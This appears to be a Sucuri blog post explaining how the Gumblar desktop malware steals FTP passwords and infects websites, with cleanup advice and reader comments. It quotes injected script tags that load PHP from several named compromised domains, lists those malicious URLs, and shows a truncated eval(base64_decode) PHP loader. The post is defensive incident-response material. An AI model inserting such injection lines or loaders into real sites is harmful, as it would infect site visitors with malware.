Web site security – It starts with your desktop

If you have a web site and you want it to be secure, the first place you have protect is your desktop.

Recently (well, since 2009), a large number of sites have been infected with malware and blacklisted due to a few desktop virus (generally called Gumblar, port 8080, etc). These virus steals your FTP password and does the following things:

Infects all .js files on your site with entries like this one:

document.write( <script src="http://wap.northernplumbingandheating.com/assets/postinfo.php
document.write( <script src=http://salsafestival-berlin.de/_fpclass/BannerWebseite2009.php

It infects every .html files with entries similar to this:

script src="http://wap.northernplumbingandheating.com/assets/postinfo.php"
script src="http://shopping-dubai.com/images/runActiveContent.php"
script src="http://stb-umhau.de/images/muffin35.php"
script src="http://salsafestival-berlin.de/_fpclass/BannerWebseite2009.php"

Every PHP file with a code similar to this one:

eval(  base64_decode(" aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEd
MT0JBTF..


It also creates backdoor files called gifimg.php on multiple directories

Note that the domain changes every time and this is just a small list of them:

http://stb-umhau.de/images/muffin35.php
http://shopping-dubai.com/images/runActiveContent.php
http://wap.northernplumbingandheating.com
http://salsafestival-berlin.de/_fpclass/BannerWebseite2009.php
http://applebe.dothome.co.kr/bbs/fla-3.php

How to clean my desktop if I have this virus?

  1. Install an anti-virus and make sure it detected and removed the problem. If it didn’t, try a different one :)
  2. Change your FTP passwords.
  3. Start using SFTP instead of FTP
  4. Do not store your FTP/SFTP password on your desktop

How to clean my site if it is infected?

You can hire us to clean it up for you and monitor your sites going forward:Malware Removal

Or if you prefer to do yourself:

  1. Scan your site to see where the malware is and how it is called on your site
  2. Download your whole site to your desktop
  3. Use grep (or wingrep) and search for src=http, eval(base64_decode(“aW
  4. Remove all those entries as well as the gifimg.php backdoors
  5. Re-upload your site back

That should clean up your site. Note that it only applies to this type of virus (Gumblar or MW:JS:150), so if you have a different one, this clean up solution may not work completely.

If your site is hacked (or contains malware), and you need help, send us an email at support@sucuri.net or visit our site: Sucuri Security. We can get your sites clean up right away.

Also, consider checking out our site security monitoring. We will monitor your sites 24×7 and alert you if it ever gets infected with malware, hacked or blacklisted.

About David Dede

David Dede is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

  • Pingback: Yet Another WordPress Security Post - Part One | Sucuri()

  • Pingback: What to do when your site gets blacklisted | Sucuri()

  • http://mimoYmima.com/ Brent Lagerman

    most of our passwords are very long and impossible to remember so to not store them on the desktop when we’re dealing with ~50 websites would be a huge pain. Every time we wanted to connect we’d have to look up the password and put it in manually… is there an easier way that is secure? I was under the impression that the passwords (on our mac computers anyway) were safe in the keychain?

  • http://www.neteffects.com.au/helpdesk help desk

    It’s always very important to keep track of everything that your system does. Do not ignore or underestimate the power of your desktop. You need to reconsider it’s importance all the time.

Share This